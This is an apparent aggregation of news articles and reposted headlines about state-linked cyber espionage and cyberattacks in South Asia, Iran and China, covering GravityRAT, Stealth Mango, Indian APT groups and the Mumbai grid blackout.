Maharashtra cybercrime department officials said that the latest update to the program by its developers is part of GravityRAT’s function as an Advanced Persistent Threat (APT), which, once it infiltrates a system, silently evolves and does long-term damage.
“GravityRAT is unlike most malware, which are designed to inflict short term damage. It lies hidden in the system that it takes over and keeps penetrating deeper. According to latest inputs, GravityRAT has now become self aware and is capable of evading several commonly used malware detection techniques,” an officer of the cybercrime unit said.
One such technique is ‘sandboxing’, to isolate malware from critical programs on infected devices and provide an extra layer of security.
“The problem, however, is that malware needs to be detected before it can be sandboxed, and GravityRAT now has the ability to mask its presence. Typically, malware activity is detected by the ‘noise’ it causes inside the Central Processing Unit, but GravityRAT is able to work silently. It can also gauge the temperature of the CPU and ascertain if the device is carrying out high intensity activity, like a malware search, and act to evade detection,” another officer said.
Officials said that GravityRAT infiltrates a system in the form of an innocuous looking email attachment, which can be in any format, including MS Word, MS Excel, MS Powerpoint, Adobe Acrobat or even audio and video files.
“The hackers first identify the interests of their targets and then send emails with suitable attachments. Thus a document with ‘share prices’ in the file is sent to those interested in the stock market. Once it is downloaded, it prompts the user to enter a message in a dialogue box, purportedly to prove that the user is not a bot. While the users take this to be a sign of extra security, the action actually initiates the process for the malware to infiltrate the system, triggering several steps that end with GravityRAT sending data to the Command and Control server regularly,” an officer said.
The other concern is that the Command and Control servers are based in several countries. The data is sent in an encrypted format, making it difficult to detect exactly what is leaked.
Human rights defenders in Pakistan face digital threats, attacks: Amnesty
Ramsha JahangirUpdated May 16, 2018 Facebook Count
KARACHI: Human rights defenders in Pakistan are under threat from a targeted campaign of digital attacks, which has seen social media accounts hacked and computers and mobile phones infected with spyware, a four-month investigation by Amnesty International revealed.
In a new report released on Tuesday titled ‘Human Rights Under Surveillance: Digital Threats Against Human Rights Defenders in Pakistan’, the human rights watchdog revealed how attackers were using fake online identities and social media profiles to ensnare Pakistani human rights defenders online and mark them out for surveillance and cybercrime.
Take a look: Every second woman rights activist faces serious threats: study
“We uncovered an elaborate network of attackers who are using sophisticated and sinister methods to target human rights activists. Attackers use cleverly designed fake profiles to lure activists and then attack their electronic devices with spyware, exposing them to surveillance and fraud and even compromising their physical safety,” said Sherif Elsayed-Ali, Director of Global Issues at Amnesty International.
HR watchdog calls on authorities to carry out investigation to identify perpetrators
The investigation showed how attackers used fake Facebook and Google login pages to trick their victims into revealing their passwords. “It is already extremely dangerous to be a human rights defender in Pakistan and it is alarming to see how attacks on their work are moving online,” he said.
The report highlighted the case of Diep Saeeda, a prominent civil society activist from Lahore. On December 2, 2017, one of her friends, Raza Mehmood Khan, a peace activist who tried to bring people from India and Pakistan together through activities like letter-writing, was subjected to an enforced disappearance.
Also read: Suspect arrested in Peshawar for giving death threats through social media
Ms Saeeda began publicly calling for Mr Raza’s release, including petitioning the Lahore High Court. Soon after, she began to receive suspicious messages from people claiming to be concerned about Mr Raza’s well-being, the report found.
As per Amnesty International’s investigation, a Facebook user who claimed to be an Afghan woman named Sana Halimi — living in Dubai and working for the UN — repeatedly contacted Ms Saeeda via Facebook Messenger, saying that she had information about Mr Raza. The operator of the profile sent her links to files containing malware called StealthAgent which, if opened, would have infected her mobile devices.
The profile — which the human rights watchdog believed was fake — was also used to trick Ms Saeeda into divulging her email address, to which she started receiving emails infected with a Windows spyware commonly known as Crimson.
Amnesty found that several human rights activists in Pakistan have been targeted in this way, sometimes by people claiming to be human rights activists themselves.
Ms Saeeda also received emails claiming to be from staff of the Punjab chief minister. The emails included false details of a supposed upcoming meeting between the provincial ministry of education and her organisation, the Institute for Peace and Secular Studies. In other cases, the attackers pretended to be students looking for guidance and tuition from Ms Saeeda.
Stealth Mango & Tangelo Selling your fruits to nation state actors
Lookout Security Intelligence has discovered a set of custom Android and iOS surveillanceware tools we’re respectively calling Stealth Mango and Tangelo. These tools have been part of a highly targeted intelligence gathering campaign we believe is operated by members of the Pakistani military. Our investigation indicates this actor has used these surveillanceware tools to successfully compromise the mobile devices of government officials, members of the military, medical professionals, and civilians. To date, we have observed Stealth Mango being deployed against victims in Pakistan, Afghanistan, India, Iraq, Iran, and the United Arab Emirates. The surveillanceware also retrieved sensitive data from individuals and groups in the United States, Australia, and the United Kingdom. These individuals and groups were not themselves targeted, but interacted with individuals whose devices had been compromised by Stealth Mango or Tangelo. We believe that the threat actor behind Stealth Mango is also behind Op C Major and Transparent Tribe.
Key findings Lookout researchers have identified a new mobile malware family called Stealth Mango. • Our research shows that Stealth Mango is being actively managed by Pakistani based actors that are likely military. • Stealth Mango is being used in targeted surveillance operations against government officials, members of the military, and activists in Pakistan, Afghanistan, India, Iraq, and the United Arab Emirates. • We determined that government officials and civilians from the United States, Australia, the United Kingdom, and Iran had their data indirectly compromised after they interacted with Stealth Mango victims. • The actors behind Stealth Mango typically lure victims via phishing, but they may also have physical access to victims’ devices. • The attacker has multi-platform capabilities. We know of the Android component and there is evidence of an iOS component. The evidence is as follows: • A sample Debian package on attacker infrastructure called Tangelo • EXIF data from exfiltrated content showed data from iPhones • WHOIS information from the attackers show registrations for the following domains: iphonespyingsoftware[.]org, iphonespyingapps[.]org, and iphonespyingapps[.]info We have identified over 15 gigabytes of compromised data on attacker infrastructure. • Exfiltrated content includes call records, audio recordings, device location information, text messages, and photos. • We found attacker infrastructure running the WSO web shell, which provides a third party with complete control over the server. • The actor deploying Stealth Mango appears to have a primarily mobile-focused capability. Stealth Mango and Tangelo appear to have been created by freelance developers with physical presences in Pakistan, India, and the United States. • These individuals belong to the same developer group. • We linked their tooling to several commodity mobile surveillance tools suggesting that they are either sharing code or have engaged with several distinct customers who are being delivered tooling based off similar source code.
Pakistan’s first-ever Cyber Security Centre launched
Aims to develop tools and technologies to protect cyberspace, sensitive data and local economy from the cyber-attacks
Pakistan government’s Cyber Security Centre has been inaugurated at Air University in Islamabad to deal with cyber security challenges in the digital age.
Faaiz Amir informed that Air University is also commencing a four year BS cyber security programme, which is designed to develop modern cyber security skills and apply them to manage computers, systems, and networks from cyber-attacks. The programme would increase the awareness and knowledge about cyber security in Pakistani students, he added.
Cyber security encompasses technologies, processes and controls that are designed to protect systems, networks and data from cyber attacks. Pakistan’s Cyber Security Centre aims to develop advanced tools and research technologies to protect Pakistan’s cyberspace, sensitive data, and local economy from the cyber-attacks.
The headquarter of the National Centre for Cyber Security will be based at Air University Islamabad with labs at different universities of Pakistan including Bahria University Islamabad, National University of Science and Technology (NUST), Information Technology University Lahore (ITU), Lahore University of Managment Sciences (LUMS), University of Peshawar, University of Engineering and Technology Peshawar, University of Nowshera, Pakistan Institute of Engineering and Applied Sciences (PIEAS), NED University Karachi, University of Engineering and Technology Lahore and University of Engineering and Technology Taxila.
Cyber-attackspose an enormous threat to the national economy, defence and security, National Security Adviser, Nasser Khan Janjua, earlier said.
After repeated calls from experts to secure the cyber space, Pakistan government has finally launched the centre to protect the cyberspace, sensitive data, and local economy from the cyber-attacks.
Last week, country’s National Counter Terrorism Authority (NACTA) also established a cyber security wing on modern lines to evolve cyber security strategies and to meet emerging cyber terrorism threats.
Journalist Warns Cyber Attacks Present A 'Perfect Weapon' Against Global Order
DAVIES: And tell us about this private cyber investigator Kevin Mandia. There was this building in China where a lot of this activity was going on - and the level of information he was able to get.
SANGER: So the building is near the Shanghai airport. And it's a big, bland, white office tower. And it is the home of Unit 61398, which is a PLA cyber unit.
DAVIES: People Liberation Army - the Chinese Army.
SANGER: The People's Liberation Army Cyber Unit. And the way that people began to understand what was happening was - Mr. Mandia, who ran a company called Mandiant that's since been merged up with FireEye, which he now runs, began to track the attacks that this unit was doing to steal intellectual property in the United States whether it was, you know, F-35 designs or other industrial designs and then turn them over to state-run Chinese firms. The hackers who would come in would sit at their computer terminals, and, unbeknownst to them, Mandiant would turn the cameras on those computers back on. So you could see them working.
And they would come in at like 8:30 in the morning. They would check sports scores. They would send a few notes to their girlfriends. A couple of them would look at a little bit of porn. You know, they would be reading newspaper articles. 9 o'clock would come. They'd start hacking into American sites. Lunchtime, they're back to sending notes to the girlfriends. They're back to checking their sports scores. I mean, it was such an interesting picture of the life of a young Chinese hacker.
DAVIES: David Sanger is a national security correspondent for The New York Times. His book about cyberwarfare is called "The Perfect Weapon." After a break, he'll take us inside the Russian hack of the Democratic National Committee, and we'll talk about President Trump's initiative to curb North Korea's nuclear program. Also, rock critic Ken Tucker reviews Father John Misty's new album. I'm Dave Davies. And this is FRESH AIR.
Journalist Warns Cyber Attacks Present A 'Perfect Weapon' Against Global Order
DAVIES: Right. I mean, obviously, to conduct the kind of disabling cyberattack that would shut down a lot of a country's infrastructure, you have to have done a lot of work beforehand. I want to be clear about this. Are we saying that we know that there are implants in our power grid which would enable the Russians or someone else to take it down?
SANGER: We know that there are implants in our power grid. Interesting question is, if somebody made use of it, how good would it be at taking it down? And that's why for the electric utility industry and for the financial industry, they've invested a huge amount in redundancy and resilience so that if you lose some set of power plants, you could contain it, route around it and be able to pick up and go on. And you just don't know until things happen how well your adversary has wired your system to take everything down. And as you said, this takes a lot of time. The United States spent years getting inside the Iranian centrifuges at Natanz and even then had to keep working on the software to improve it. The North Koreans, when they went into Sony Pictures in 2014 in retaliation for the release of a really terrible movie called "The Interview" that envisioned the assassination of Kim Jong Un, the same friendly Kim Jong Un we all saw in Singapore the other day - when the North Koreans went in, they went in in early September of 2014. They didn't strike until around Thanksgiving because it took all that time just to map out the interconnections of the electrical system, of the computer system, and when they did strike, it was devastating. They took out 70 percent of Sony's computer servers and hard drives.
DAVIES: OK. In this book, you say that, you know, cyberwarfare is the kind of game-changing innovation that's - you compare it to the introduction of aircraft into warfare in the early 20th century and that we are still figuring out what rules or conventions should apply to it. I want to get to some of that conversation, but let's talk a bit about some of the experience that we've had over the last 10 years. You write that in 2008, a woman at the National Security Agency, Debora Plunkett, discovers something about the classified networks in the Pentagon that's troubling. What did she find?
SANGER: Well, she was overseeing security at the NSA, and somebody came to her with evidence that the Russians - though the U.S. did not announce it was Russians at the time - were deep into something called the SIPRNet, which is basically a classified network by which the Defense Department, some of the intelligence agencies, sometimes the State Department, communicate with each other. And this was a big shock to everybody because they had seen the Russians in unclassified systems before, but here they were deep into a classified system. And the first question was, how'd they get in? And the answer was so simple that it really was a wakeup call. Somebody had distributed little USB keys, you know, the kinds you get at conventions and all those kinds of...
How #Israel's #Mossad broke into an #Iranian facility and stole half a ton of #nuclear files. Mossad agents broke into a warehouse in an industrial area in #Tehran, had 6 and 1/2 hours to finish the job before the morning shift arrived at 7 A.M. #Iran
An operation by the Mossad earlier this year to steal files relating to Iran's nuclear program was conducted on January 31, according to a report by the New York Times. Mossad operatives broke into a warehouse in an industrial area in Tehran and, according to the report, had six hours and 29 minutes to finish the job before the morning shift arrived at 7 A.M. During this limited time, they disabled the alarms, broke through two doors, burned open dozens of safes and fled the city with the documents.
The agents were carrying blowtorches that burned at some 2,000 degrees Celsius to cut through the safes, according to the Times,. The report suggests that Israel may have had help on the inside, since it says that the Mossad agents knew exactly which safes to break into – leaving many of the others untouched. At the end of the night, the agents fled with half a ton of secret materials, including 50,000 pages and 163 compact discs containing files, videos and plans.
The Iranians began storing the files at the warehouse after signing a landmark 2015 accord on its nuclear program with the United States, European powers, Russia and China. The deal gave the UN nuclear watchdog access to suspected nuclear sites in Iran.
Israel claims that after signing the agreement, the Iranian regime collected files from across the country about the nuclear program, storing them at the warehouse. The warehouse wasn't guarded around the clock so as to not arouse suspicion.
The report was based on briefings Israel gave Western media outlets last week and included details from the stolem documents, which were presented in April by Prime Minister Benjamin Netanyahu in a prime time address.
The report further stated that Israeli officials said Tehran received help for its nuclear program from Pakistan and from other foreign experts.
Another report, from the Washington Post, says that Iran was on the verge of acquiring "key bombmaking technologies" when the program, code-named Project Amad, was halted some 15 years ago.
Could Offensive #Cyber Capabilities Tip #India and #Pakistan to War? India launched Operation Hangover targeting Pakistan and, in response, Pakistan responded with Operation Arachnophobia, seeking to obtain intelligence from Indian officials @Diplomat_APAC http://thediplomat.com/2019/03/could-offensive-cyber-capabilities-tip-india-and-pakistan-to-war/
While both countries are responding to the rise in cyberattacks with national strategies and increased defensive capabilities, we do not know how they will set the rules when it comes to offensive cyber operations. We do know both countries are pursuing cybersecurity to protect against cyberattacks.
India has been establishing national cybersecurity policies to address the rise in persistent cyberattacks. The country is vulnerable to cyberattacks—it was ranked as the second most vulnerable nation-state targeted by cyberattacks in a survey by security company Symantec. As India’s economy has shifted toward information and communications technology (ICT), which includes information technology services, commerce, and banking sectors, there are concerns of cyberespionage and cyberattacks taking place against Indian industries and businesses.
In fact, according to a study commissioned by the High Court of India, cyber-related crimes cost Indian businesses $4 billion in 2013. This has led the government and private sector to increase their efforts to protect these industries. Back in 2013, India unveiled its National Cyber Security policy. This policy outlined measures the government would take in protecting India’s critical infrastructure. However, many critics point out this national policy has done little to curb cyberattacks as there is no way to implement many of its policies.
Pakistan is also on alert, though it does not have a national cybersecurity strategy document, despite efforts in Islamabad to develop a framework that will protect critical institutions from cyberattacks. These efforts have been motivated in part by the Edward Snowden leaks, which detailed the U.S. National Security Agency’s spying on Pakistan and were an inflection point for Pakistani government officials, as they realized they needed to address the gaps in their information security. A national Cyber Security Strategy was presented to the National Assembly, but no headway has been made yet on implementing the proposed actions, which included the creation of a national CERT and an Inter-Services Cyber Command Center that would streamline cyber defense for Pakistan’s Army. Pakistan still does not have an official national cybersecurity strategy.
Both countries’ security postures are transforming slowly to introduce cybersecurity. However, there is still not enough data available on what types of technologies these countries possess and how integrated these technologies are in India and Pakistan’s national security strategies. There are reports that both countries have engaged in offensive cyber operations. Each country has their own cyberespionage division, which siphons critical information from other national-states’ security and intelligence organizations.
India launched Operation Hangover that has targeted Pakistan and, in response, Pakistan spearheaded Operation Arachnophobia, which sought to obtain intelligence from Indian officials. While these operations are well-known, there is still a lack of awareness on how much each country spends on cyber technologies and the types of technologies they are employing. India is one of the largest spenders on military, yet the cybersecurity budget is “inadequate” for the growing cyber threat.
Understanding cyber capabilities is important because they can change geopolitical calculations. For example, the low cost of entry for offensive cyber capabilities benefits less resourced actors, and “offense preference” in cyberspace makes it easier to succeed on offense than at defense.
#India says a #Pakistani spy used bots to lure 98 #Indian targets in Army, Navy and Air Force, including #BrahMos #Missile Project Engineer, on #Facebook using 'Whisper', 'Gravity Rat' malware.
http://toi.in/xozvDa41/a24gk via @timesofindia
A recent investigation revealed how a Pakistani spy on Facebook named Sejal Kapoor hacked into the computers of 98 Indian defence officials since 2015. She was also involved in the leak of classified files of BrahMos missile in 2018.
It has been revealed that the hacker targeted officials from Indian Army, Navy, Air Force, paramilitary forces and state police personnel in Rajasthan, Madhya Pradesh, Uttar Pradesh, and Punjab between 2015 and 2018, reported TOI.
The hacker deceived her targets by sharing pictures and videos using a software malware called "Whisper", which is reported to be connected to a third-party server in a West Asian country.
Sejal's involvement in last year's leakage of sensitive technical information to Pakistan was also established in the recent investigation.
In 2018, an engineer working at the BrahMos Aerospace Private Limited, Nishant Agarwal, was arrested for providing technical information on BrahMos missiles to Pakistan in a joint operation by the Uttar Pradesh and Maharashtra Anti-Terrorism Squad (ATS) as well as the Military Intelligence (MI).
It was then revealed that Agarwal exchanged sensitive information to Pakistan spy agency Inter-Services Intelligence (ISI) based on evidence found on his personal computer and Facebook chat records.
Apart from the "Whisper" application, another software that the spy used was "Gravity Rat." The Indian intelligence agencies say that both the software use "self-aware" detection techniques as well as VPN hiding mechanism that enables a hacker to use around 25 internet addresses. The complex malware technology is stated to not be easily identified by anti-malware software.
The five dozen chats recently uncovered by intelligence agency revealed that Sejal would "force install" the Whisper app on computers of the targeted officials, reported TOI.
"Instantly, after getting downloaded, the malware first prompts the user to key in a code. It's to ensure that the app is not a virus or malware. Immediately after that, it scans all latest attachments sent from the computer in emails or downloads. It then scans all files with photographs, databases of MS Word and MS Excel, by first verifying their encryption keys and then opening their passwords," said a senior intelligence officer, reported TOI.
According to Sejal's Facebook profile, the hacker is an employer of a company called "Growth Company" in Manchester, the UK. Experts have claimed that such cases of armed force officials "honey-trapped" into sharing classified information are a threat to India's national security.
Last year, a Border Security Force (BSF) soldier was arrested by Uttar Pradesh ATS on September 18 for sharing key information about the unit's operations to a female Pakistan ISI agent, who claimed to be a defence reporter.
Mysterious Explosion and Fire Damage #Iranian Nuclear Enrichment Facility Building New Advanced Centrifuges. A decade ago, the #UnitedStates and #Israel used #Stuxnet worm in operation code-named “Olympic Games" which destroyed 1,000 #Iranian centrifuges.
A fire ripped through a building at Iran’s main nuclear-fuel production site early Thursday, causing extensive damage to what appeared to be a factory where the country has boasted of producing a new generation of centrifuges. The United States has repeatedly warned that such machinery could speed Tehran’s path to building nuclear weapons.
The Atomic Energy Agency of Iran acknowledged an “incident” at the desert site, but did not term it sabotage. It released a photograph showing what seemed to be destruction from a major explosion that ripped doors from their hinges and caused the roof to collapse. Parts of the building, which was recently inaugurated, were blackened by fire.
But it was not clear how much damage was done underground, where video released by the Iranian government last year suggested most of the assembly work is conducted on next-generation centrifuges — the machines that purify uranium.
The fire took place inside the nuclear complex at Natanz, where the Iranian desert gives way to barbed wire, antiaircraft guns and an industrial maze. The damaged building is adjacent to the underground fuel production facilities where, a decade ago, the United States and Israel conducted the most sophisticated cyberattack in modern history, code-named “Olympic Games.” That attack, which lasted for several years, altered the computer code of Iran’s industrial equipment and destroyed roughly 1,000 centrifuges, setting back Iran’s nuclear program for a year or more.
The early evidence strongly suggested on Thursday the damage was in fact sabotage, though the possibility remained that it was the result of an industrial accident.
The timing was suspicious: A series of unexplained fires have broken out in recent days at other facilities related to the nuclear program. Still, experts noted that if the explosion was deliberately set, it showed none of the stealth and secrecy surrounding the complex cyberattacks by the United States and Israel that were first ordered by President George W. Bush toward the end of his term, and then extended by President Barack Obama.
The Persian language service of the BBC reported that several members of its staff received an email from a previously unknown group, which referred to itself as the Homeland Cheetahs, before news of the fire became public. The group claimed responsibility and said it was composed of dissidents in Iran’s military and security apparatus. They said the attack would target above-ground sections of the targeted facilities so that the Iranian government could not cover up the damage.
There was no way to confirm if Homeland Cheetahs was a real group, and if so whether it was domestic, as it claimed, or supported by a foreign power.
A Middle Eastern intelligence official, who would not be quoted by name because he was discussing closely held information, said the blast was caused by an explosive device planted inside the facility. The explosion, he said, destroyed much of the aboveground parts of the facility where new centrifuges — delicate devices that spin at supersonic speeds — are balanced before they are put into operation.
Pakistan has established #Cyber Forensic Laboratory at NUST, and the #Computer Emergency Response Team (PAK-CERT). #Pakistan has made major progress in #Nuclear ‘Security and Control Measures’ category with an incredible (+25) points. https://moderndiplomacy.eu/2020/08/18/nti-2020-and-pakistans-cyber-preparedness/
Among countries with weapons-usable nuclear materials, Australia for the third time has been ranked at the first position in the sabotage ranking and for the fifth time for its security practices. Likewise, New Zealand and Sweden stand first in the ranking for countries without materials. It is very pertinent to highlight here that Pakistan’s commitment towards nuclear safety and security, has also been duly acknowledged. In this regard, since Pakistan has adopted new on-site physical protection and cyber security regulations, it has been appreciated in the index. This would likely further improve Pakistan’s existing insider threat prevention measures. Nevertheless, the 2020 NTI report has ranked Pakistan among the countries that have nuclear materials but its adherence to nuclear safety and security has been vindicated.
It is worth mentioning here that in the theft ranking for countries with nuclear materials, Pakistan has improved its ranking by an overall score of 7 points. In this regard, Pakistan has made major progress in the ‘Security and Control Measures’ category with an incredible (+25) points based on the new regulations. Also, Pakistan has improved in the Global Norms category with (+1) points. The strengthened laws and regulations have provided sustainable security benefits and resulted in improving Pakistan’s overall score. Moreover, Pakistan’s improvement in the Security and Control Measures category is quite significant. Over time, by improving +8 points in 2014, +2 points in 2016, and +6 points in 2018, Pakistan has steadily improved in the Security and Control Measures category. Owing to new regulations for on-site physical protection its score has improved since 2014. Whereas since 2018; the insider threat protection has also improved. When the report was first launched in 2012, since then Pakistan, unlike other states has improved its score in the security and control measure category with 25 points. This is an incredible improvement as it is the second-largest improvement among the related states.
At the national level, Pakistan has taken various initiatives including; the establishment of Cyber Forensic Laboratory at the National University of Science and Technology (NUST), and the Computer Emergency Response Team (PAK-CERT) to deal with cyber-related threats. Furthermore, the National Centre for Cyber Security at the Air University also aims at making cyberspace of Pakistan more secure. It has affiliated Research and Development Laboratories working on projects related to network security systems and smart devices. To maintain such a status, in the longer term, Pakistan needs to further expand the scope of its existing national cyber policy framework. This would enhance Pakistan’s capabilities to tackle cyber threats to nuclear security in a more efficient way.
Hence, the emergence of cyber threats to nuclear security both at the regional and the global levels needs to be addressed with greater cooperation among the states. Likewise, it is also essential to address the human factor for cyber security when insiders could unwittingly introduce or exacerbate cyber vulnerabilities. Pakistan needs to further enhance the role and increase the capacity of its specialized cyber workforce. In this regard, if required, the number of highly skilled technical staff may be increased keeping view of the emergent cyber threats to the nuclear facilities.
Rank 2020 Country Score 2019 Score 2020 % of Mobiles Infected with Malware Financial Malware Attacks (% of Users) % of Computers Infected with Malware % of Telnet Attacks by Originating Country (IoT) % of Attacks by Cryptominers Best Prepared for Cyberattacks Most Up-to-Date Legislation
1 1 Algeria 55.75 48.99 26.47 0.5 19.75 0.07 1.27 0.262 1
- 1 Tajikistan - 48.54 2.62 1.4 8.12 0.01 7.90 0.263 2
- 3 Turkmenistan - 48.39 4.89 1.1 5.84 0 7.79 0.115 2
- 4 Syria - 44.51 10.15 1.2 13.99 0.01 1.36 0.237 1
9 5 Iran 43.29 43.48 52.68 0.8 7.21 3.31 1.43 0.641 2
8 6 Belarus 45.09 41.64 2.10 2.9 13.34 0.05 2.35 0.578 3
6 7 Bangladesh 47.21 40.36 30.94 0.8 16.46 0.38 1.91 0.525 3.5
7 8 Pakistan 47.10 40.33 28.13 0.8 9.96 0.37 2.41 0.407 2.5
5 9 Uzbekistan 50.50 39.41 4.14 2.1 10.5 0.02 4.99 0.666 3
According to our study, Algeria is still the least cyber-secure country in the world despite its score improving slightly. With no new legislation (as was the same with all countries), it is still the country with the poorest legislation (only one piece of legislation — concerning privacy — is in place). It also scored poorly for computer malware infection rates (19.75%) and its preparation for cyberattacks (0.262). Nevertheless, only its score for lack of preparation that worsened over the last year (and its score for legislation which couldn’t get any worse). In all of the other categories, attacks declined, as was the common trend for most countries.
Other high-ranking countries were Tajikistan, Turkmenistan, Syria, and Iran, which took over from last year’s Indonesia, Vietnam, Tanzania, and Uzbekistan.
The highest-scoring countries per category were:
Highest percentage of mobile malware infections – Iran – 52.68% of users
Highest number of financial malware attacks – Belarus – 2.9% of users
Highest percent of computer malware infections – Tunisia – 23.26% of users
Highest percentage of telnet attacks (by originating country) – China – 13.78%
Highest percentage of attacks by cryptominers – Tajikistan – 7.9% of users
Least prepared for cyber attacks – Turkmenistan – 0.115
Worst up-to-date legislation for cybersecurity – Algeria – 1 key category covered
Apart from Algeria, China was the only country that stayed at the top of one of these lists – all of the other countries are new since last year.
Experts are unanimous in saying that the most important target of #Indian #cyber-#espionage & #cyberattacks by far is #Pakistan. Limited employment prospects of Indian techies have created a swarm of underground threat actors in #India| The Daily Swig
ANALYSIS India is sometimes overlooked by some in the threat intelligence community, even though the South Asian nation has advanced cyber capabilities – not least a huge pool of talent.
The country boasts a large number of engineers, programmers, and information security specialists, but not all of this tech talent was put to good use, even before the Covid-19 pandemic cast a shadow over the global economy.
Their somewhat limited employment prospects are said to have created a swarm of underground Indian threat actors eager to show off their hacking talents and make money – a resource that the Indian government might be able to tap into in order to bolster its own burgeoning cyber-espionage resources.
India is in catch-up mode for now, but has the technical resources to make rapid progress.
Who is being targeted by Indian hacking groups?
Geopolitical factors have fueled an increase in cyber threat activity both originating from and targeting India.
Experts quizzed by The Daily Swig were unanimous in saying that the most important target of Indian cyber-espionage by far is Pakistan – a reflection of the decades-long struggle over the disputed region of Kashmir.
China, India’s neighbour and an ally of Pakistan, is also a top target of state-sponsored Indian cyber-espionage.
Paul Prudhomme, head of threat intelligence advisory at IntSights, told The Daily Swig: “Indian cyber-espionage differs from that of other top state-sponsored threats, such as those of Russia and China, in the less ambitious geographic scope of their attacks.”
Other common targets of Indian hacking activity include other nations of the South Asian subcontinent, such as Bangladesh, Sri Lanka, and Nepal. Indian espionage groups may sometimes expand their horizons further to occasional targets in Southeast Asia or the Middle East.
Indian cyber-espionage groups typically seek information on Pakistan’s government, military, and other organizations to inform and improve its own national security posture.
But this is far from the only game in town.
For example, one Indian threat group called ‘Dark Basin’ has allegedly targeted advocacy groups, senior politicians, government officials, CEOs, journalists, and human rights activists across six continents over the last seven years.
India is currently considered to have a less mature cyber warfare armoury and capability than the ‘Big Six’ – China, North Korea, Russia, Israel, the UK, and US – but this may change over time since its capability is growing.
Chris Sedgwick, director of security operations at Talion, the managed security service spinoff of what used to be BAE System’s intelligence division, commented:
The sophistication of the various Indian cyber threat actors do not appear to be in the same league as China or Russia, and rather than having the ability to call on a cache of 0-day exploits to utilise, they have been known to use less sophisticated – but still fairly effective – techniques such as decoy documents containing weaponised macros.
Experts are unanimous in saying that the most important target of #Indian #cyber-#espionage & #cyberattacks by far is #Pakistan. Limited employment prospects of Indian techies have created a swarm of underground threat actors in #India| The Daily Swig
Morgan Wright, chief security advisor at SentinelOne and former US State Department special advisor, told The Daily Swig: “India’s growing offensive capability is still immature compared to China, North Korea, Russia, Israel, the UK and US. However, there is no shortage of people with advanced technical skills in India.”
With Covid-19 causing significant unemployment in India, it can be “safely assumed a portion of people with these skills will engage in cybercrime”, according to Wright.
“Ironically, tactics learned in committing cybercrime will be of value to the intelligence and military establishment in India as they develop and grow units to engage in cyber warfare and espionage,” he said.
Assaf Dahan, senior director and head of threat research at Cybereason, told The Daily Swig: “The level of sophistication of the activity groups affiliated with India can vary; some groups have shown a high level of sophistication and use of advanced custom-built tools or advanced exploits, while others exhibited significantly less sophisticated capabilities.
“Sometimes a group might exhibit different levels of sophistication on different operations, based on the group’s needs and reasoning,” he added.
Dahan concluded: “Another point to remember: the level of sophistication isn’t always correlated with the success rate of the group’s operation or goals. Sometimes, simple social engineering attacks delivering a known commodity malware can be enough to get the threat actors what they want.”
What examples are there of Indian APT groups?
Recent attacks by Indian hacker groups:
The highly active cyber-espionage entity known as SideWinder has been plaguing governments and enterprises since 2012. A recently released report by AT&T Alien Labs shows most of SideWinder’s activity is heavily focused on South Asia and East Asia, with the group likely supporting Indian political interests.
The allegedly Indian state-sponsored group Dropping Elephant has been known to target the Chinese government via spear-phishing and watering hole attacks.
Viceroy Tiger has been known to use weaponised Microsoft Office documents in spear-phishing campaigns. Security researchers at Lookout recently went public with research on mobile malware attributed to the threat actors and rated as medium sophistication.
The level of direct Indian government involvement in some of these operations is contested.
Cybereason’s Dahan cautioned: “The line between ‘state operated’ or ‘state ordered’ can be rather fine, so it’s not always easy to link certain operations directly to an official government or military institution, especially due to the growing popularity of cyber mercenaries (hackers-for-hire).”
How might India expand its cyber warfare capabilities and defences?
Through an emerging initiative to provide technology education to 400,000 low-income students, India will significantly increase its cyber “bench strength”, according to Mike Hamilton, former CISO for the City of Seattle and co-founder and CISO of cybersecurity firm CI Security.
Hamilton predicted that a “cybercrime population will emerge [in India] and differentiate itself from nationalist motivations”.
Other experts reckon the flow of talent will run the other way and allow Indian to expand its cyber-espionage capabilities from the cohorts of cybercriminals.
#China Appears to Warn #India : Push Too Hard and the Lights Could Go Out in the Entire #SouthAsian Nation of 1.3 billion. Most of the #malware was never activated in the #Mumbai grid attack that was meant as a warning to #Modi. - The New York Times
As border skirmishing increased last year, malware began to flow into the Indian electric grid, a new study shows, and a blackout hit Mumbai. It now looks like a warning.
Early last summer, Chinese and Indian troops clashed in a surprise border battle in the remote Galwan Valley, bashing each other to death with rocks and clubs.
Four months later and more than 1,500 miles away in Mumbai, India, trains shut down and the stock market closed as the power went out in a city of 20 million people. Hospitals had to switch to emergency generators to keep ventilators running amid a coronavirus outbreak that was among India’s worst.
Now, a new study lends weight to the idea that those two events may well have been connected — as part of a broad Chinese cybercampaign against India’s power grid, timed to send a message that if India pressed its claims too hard, the lights could go out across the country.
The study shows that as the standoff continued in the Himalayas, taking at least two dozen lives, Chinese malware was flowing into the control systems that manage electric supply across India, along with a high-voltage transmission substation and a coal-fired power plant.
The flow of malware was pieced together by Recorded Future, a Somerville, Mass., company that studies the use of the internet by state actors. It found that most of the malware was never activated. And because Recorded Future could not get inside India’s power systems, it could not examine the details of the code itself, which was placed in strategic power-distribution systems across the country. While it has notified Indian authorities, so far they are not reporting what they have found.
Stuart Solomon, Recorded Future’s chief operating officer, said that the Chinese state-sponsored group, which the firm named Red Echo, “has been seen to systematically utilize advanced cyberintrusion techniques to quietly gain a foothold in nearly a dozen critical nodes across the Indian power generation and transmission infrastructure.”
The discovery raises the question about whether an outage that struck on Oct. 13 in Mumbai, one of the country’s busiest business hubs, was meant as a message from Beijing about what might happen if India pushed its border claims too vigorously.
News reports at the time quoted Indian officials as saying that the cause was a Chinese-origin cyberattack on a nearby electricity load-management center. Authorities began a formal investigation, which is due to report in the coming weeks. Since then, Indian officials have gone silent about the Chinese code, whether it set off the Mumbai blackout and the evidence provided to them by Recorded Future that many elements of the nation’s electric grid were the target of a sophisticated Chinese hacking effort.
It is possible the Indians are still searching for the code. But acknowledging its insertion, one former Indian diplomat noted, could complicate the diplomacy in recent days between China’s foreign minister, Wang Yi, and his Indian counterpart, Subrahmanyam Jaishankar, in an effort to ease the border tensions.
#India Suspects #China May Be Behind Major #Mumbai Blackout. Officials are investigating whether #cyberattacks from China could have caused the #power outage, an assertion that China rejects. #Modi #Ladakh https://www.wsj.com/articles/india-suspects-china-may-be-behind-major-mumbai-blackout-11614615383
Indian officials are investigating whether cyberattacks from China could have been behind a blackout in Mumbai last year.
State officials in Maharashtra, of which Mumbai is the capital, said Monday that an initial investigation by its cyber department found evidence that China could have been behind a power outage that left millions without power in October.
